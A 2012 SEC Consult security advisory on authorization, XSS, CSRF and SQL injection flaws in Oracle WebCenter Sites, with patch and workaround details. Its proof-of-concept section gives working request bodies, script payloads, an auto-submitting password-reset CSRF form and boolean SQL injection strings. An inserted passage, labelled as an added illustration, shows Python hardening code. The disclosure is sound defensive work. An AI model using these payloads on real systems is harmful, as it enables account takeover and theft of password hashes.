Oracle WebCenter Sites (AKA FatWire) XSS / SQL Injection / CSRF

Published: 2012-10-17 00:00:00
Author: F. Lukavsky
Source: packetstormsecurity.com (PACKETSTORM:117458)
EPSS: 0.001 (Low), percentile 50.2%

SEC Consult Vulnerability Lab Security Advisory < 20121017-2 >  
=======================================================================  
title: Multiple vulnerabilities in Oracle WebCenter Sites  
product: Oracle WebCenter Sites (former FatWire Content Server)  
vulnerable version: 6.1, 6.2, 6.3.x, 7, 7.0.1, 7.0.2, 7.0.3, 7.5, 7.6.1,  
7.6.2, 11.1.1.6.0  
fixed version: Patch information see sections below  
CVE: CVE-2012-3183 (S0183794)  
CVE-2012-3184 (S0183815)  
CVE-2012-3185 (S0183827)  
CVE-2012-3186 (S0183836)  
impact: High  
homepage: http://www.oracle.com/us/corporate/acquisitions/fatwire/index.html  
found: 21.05.2012  
by: F. Lukavsky   
SEC Consult Vulnerability Lab   
https://www.sec-consult.com  
=======================================================================  
  
Vendor description:  
-------------------  
FatWire Content Server is a predecessor product of Oracle WebCenter Sites.  
  
FatWire Content Server is a software suite that allows you to create and   
manage content to be published on your online site. The content is stored in   
Content Server's database. You create and manipulate the content using Content   
Server's interface, which provides a simple and intuitive way of accessing and   
working with the CS database.  
  
FatWire Content Server 7 - Advanced Interface User's Guide  
<http://docs.oracle.com/cd/E28662_01/doc.76/content_server/cs_user_advanced_76p2.pdf>  
  
  
Vulnerability overview/description:  
-----------------------------------  
1) Authorization Issues  
The backend of the Content Server fails to validate authorization for  
certain requests. This allows low-privileged users to manipulate data  
which they are not authorized to modify.  
  
2) Cross-Site Scripting  
The backend of the Content Server is prone to persistent and reflected   
Cross-Site Scripting attacks. The vulnerability can be used to inject   
HTML or JavaScript code into the affected web page. The code is executed   
in the browser of users who visit the manipulated site. The   
vulnerability can be used to change the contents of the displayed site,   
redirect to other sites or steal user credentials. Additionally, Portal   
users are potential victims of browser exploits and JavaScript Trojans.   
  
3) Cross-Site Request Forgery  
An attacker can use Cross-Site Request Forgery to perform arbitrary web   
requests with the identity of the victim without being noticed by the   
victim. Although responses to these requests are not delivered to the   
attacker, in many cases it is sufficient to be able to compromise the   
integrity of the victim's information stored on the site or to perform   
certain, possibly compromising requests to other sites.  
  
4) SQL Injection  
Due to insufficient input validation, the backend of FatWire Content   
Server allows the injection of direct SQL commands. By exploiting the   
vulnerability, an attacker gains access to all records stored in the   
database with the privileges of database user CSAUTHORING.  
  
  
Proof of concept:  
-----------------  
  
1) In the user profile, users can change their email address. By   
supplying arbitrary user names, a low-privileged user can change the   
email address of other users:  
  
POST /cs/ContentServer HTTP/1.1  
  
_charset_=UTF-8&cs_environment=standard&cs_formmode=WCM&username=<username of the target user>&email=<new email address>&selectedLocale=None&userid=userid%3D<own user id>%2Cou%3DPeople&manageprofile=true&password=&password2=&pagename=OpenMarket%2FXcelerate%2FAdmin%2FUserProfilePost&action=edit  
  
2) The display name of page elements is included unsanitized when viewing   
the element's details. Creating a new image with the following manipulated   
parameter demonstrates this issue:  
  
-----------------------------6083206021221  
Content-Disposition: form-data; name="flexassets:name"  
  
xxx.jsp</script><script>alert(document.location)</script>  
-----------------------------6083206021221  
  
  
Additionally, users can change their email address in the user profile   
management. The email address is included unsanitized when viewing a   
manipulated profile. Furthermore, by combining this issue with the attack   
described in vulnerability (1), the Cross-Site Scripting payload can be   
embedded in the user profile of arbitrary users. The following request   
demonstrates this issue:  
  
POST /cs/ContentServer HTTP/1.1  
  
_charset_=UTF-8&cs_environment=standard&cs_formmode=WCM&username=<username of the target user>&email=<manipulated email address>%3Cscript%3Ealert%28document.location%29%3C%2Fscript%3E&selectedLocale=None&userid=userid%3D<own user id>%2Cou%3DPeople&manageprofile=true&password=&password2=&pagename=OpenMarket%2FXcelerate%2FAdmin%2FUserProfilePost&action=edit  
  
Many parameters are included unsanitized in error messages, which  
leads to reflected Cross-Site Scripting vulnerabilities:  
http://fatwire/cs/ContentServer?username=<script>alert(document.location)</script>&manageprofile=true&action=edit&pagename=OpenMarket%2FXcelerate%2FAdmin%2FUserProfileFront   
http://fatwire/cs/ContentServer?StartItem=1327334935133"><script>alert(document.location)</script>&AssetType=Page&cs_environment=standard&pagename=OpenMarket%2FXcelerate%2FActions%2FNewContentFront&cs_formmode=WCM  
  
These examples do not claim to be complete.   
  
  
3) A low-privileged user can view all available users and their user ids   
when creating a workflow report. When the target user submits the   
following form while being logged in, an attacker can change the   
password of the target user to an arbitrary value:  
  
<html>  
<body onload="document.forms[0].submit()">  
<form action="http://fatwire/cs/ContentServer" method="POST">  
<input type="hidden" name="_charset_" value="UTF-8" />  
<input type="hidden" name="cs_environment" value="standard" />  
<input type="hidden" name="cs_formmode" value="WCM" />  
<input type="hidden" name="username" value="<target user>" />  
<input type="hidden" name="email" value="" />  
<input type="hidden" name="selectedLocale" value="None" />  
<input type="hidden" name="userid" value="userid=<target user id>,ou=People" />  
<input type="hidden" name="modifyPassword" value="on" />  
<input type="hidden" name="manageprofile" value="true" />  
<input type="hidden" name="password" value="<new password>" />  
<input type="hidden" name="password2" value="<new password>" />  
<input type="hidden" name="pagename" value="OpenMarket/Xcelerate/Admin/UserProfilePost" />  
<input type="hidden" name="action" value="edit" />  
</form>  
</body>  
</html>  
  
  
4) The parameter selectedLocale of the user profile management form is   
vulnerable to SQL Injection. The following true comparison appended to   
the SQL query results in the locale preference being set to   
English (United States):  
  
POST /cs/ContentServer HTTP/1.1  
  
_charset_=UTF-8&cs_environment=standard&cs_formmode=WCM&username=user&[email protected]&selectedLocale=None'+or+1%3d1--+&userid=userid%3D1327334925026%2Cou%3DPeople&manageprofile=true&pagename=OpenMarket%2FXcelerate%2FAdmin%2FUserProfilePost&action=edit   
  
The following request, with a false comparison appended to the SQL query,   
results in the locale preference being set to no preference:  
  
POST /cs/ContentServer HTTP/1.1  
  
_charset_=UTF-8&cs_environment=standard&cs_formmode=WCM&username=user&[email protected]&selectedLocale=None'+or+1%3d2--+&userid=userid%3D1327334925026%2Cou%3DPeople&manageprofile=true&pagename=OpenMarket%2FXcelerate%2FAdmin%2FUserProfilePost&action=edit  
  
By observing these differences, arbitrary data can be extracted from the   
database bit by bit. This includes, for example, the password hashes of   
other Content Server users.  
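The following is an added illustration, not SEC Consult's or Oracle's code, of how a profile-edit handler closes the four issues demonstrated above: the CSRF token check (3), deriving the edited profile from the session rather than the submitted username/userid (1), whitelisting and binding selectedLocale instead of concatenating it (4), and escaping stored fields on output (2). The handler, the UserProfile table, the session layout and the locale list are hypothetical stand-ins for the product's own.

```python
import html
import hmac
import sqlite3

# Constructed in-memory stand-in for the profile table; not the product's schema.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE UserProfile (username TEXT PRIMARY KEY, email TEXT, locale TEXT)")
db.executemany("INSERT INTO UserProfile VALUES (?, ?, ?)",
               [("user", "user@example.invalid", "None"),
                ("admin", "admin@example.invalid", "None")])
db.commit()

# Locale values the form may submit (hypothetical list); anything else is rejected
# before any query is built.
ALLOWED_LOCALES = {"None", "en_US", "de_DE"}


def handle_profile_post(session, params):
    """Hardened profile-edit handler. Returns (http_status, message)."""
    # Vuln 3, CSRF: the form must carry a token bound to the session, compared in constant time.
    sent = params.get("csrf_token", "").encode()
    if not hmac.compare_digest(sent, session["csrf_token"].encode()):
        return 403, "missing or invalid CSRF token"
    # Vuln 1, authorization: which profile may be edited is decided from the authenticated
    # session, never from the client-supplied username/userid pair alone.
    target = params.get("username", "")
    if target != session["user"] and not session.get("is_admin", False):
        return 403, "not authorized to edit this profile"
    # Vuln 4, SQL injection: whitelist the locale and bind every value instead of
    # concatenating it into the UPDATE statement.
    locale = params.get("selectedLocale", "None")
    if locale not in ALLOWED_LOCALES:
        return 400, "unsupported locale"
    db.execute("UPDATE UserProfile SET email = ?, locale = ? WHERE username = ?",
               (params.get("email", ""), locale, target))
    db.commit()
    return 200, "profile updated"


def profile_row(username):
    """Stored (raw) email and locale of a user, or None if unknown."""
    return db.execute("SELECT email, locale FROM UserProfile WHERE username = ?",
                      (username,)).fetchone()


def render_profile(username):
    """Profile view: every stored field is HTML-escaped on output (vuln 2)."""
    row = profile_row(username)
    if row is None:
        return "<p>no such user</p>"
    email, locale = row
    return f"<p>{html.escape(username)}: {html.escape(email)} ({html.escape(locale)})</p>"
```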
  
  
Vulnerable / tested versions:  
-----------------------------  
The following installation has been tested: FatWire Content Server 7.6.1  
Hotfix 4  
  
  
The following versions have been supplied by Oracle and are vulnerable too:  
6.1, 6.2, 6.3.x, 7, 7.0.1, 7.0.2, 7.0.3, 7.5, 7.6.1, 7.6.2, 11.1.1.6.0  
  
  
  
Vendor contact timeline:  
------------------------  
2012-06-04: Contacting vendor through [email protected]  
2012-06-07: Initial vendor response - issues will be verified  
2012-06-21: Under investigation / Being fixed in main codeline  
2012-07-24: Issue fixed in main codeline, scheduled for a future CPU  
2012-10-15: Oracle: Advisory and patches will be released on 2012-10-16  
2012-10-16: Oracle releases October 2012 CPU  
2012-10-17: Public release of SEC Consult advisory  
  
  
  
Solution:  
---------  
Apply latest patches, see:  
  
http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html  
https://support.oracle.com/rs?type=doc&id=1477727.1  
  
  
Workaround:  
-----------  
Restrict access to the backend of the FatWire Content Server.  
Do not visit untrusted sites while being logged into the backend of the   
FatWire Content Server.  
Keep the time being logged in as short as possible and do not activate   
the option to stay logged into the backend of the FatWire Content Server.  
  
  
Advisory URL:  
-------------  
https://www.sec-consult.com/en/advisories.html  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
SEC Consult Unternehmensberatung GmbH  
  
Office Vienna  
Mooslackengasse 17  
A-1190 Vienna  
Austria  
  
Tel.: +43 / 1 / 890 30 43 - 0  
Fax.: +43 / 1 / 890 30 43 - 25  
Mail: research at sec-consult dot com  
https://www.sec-consult.com  
  
EOF F. Lukavsky / @2012  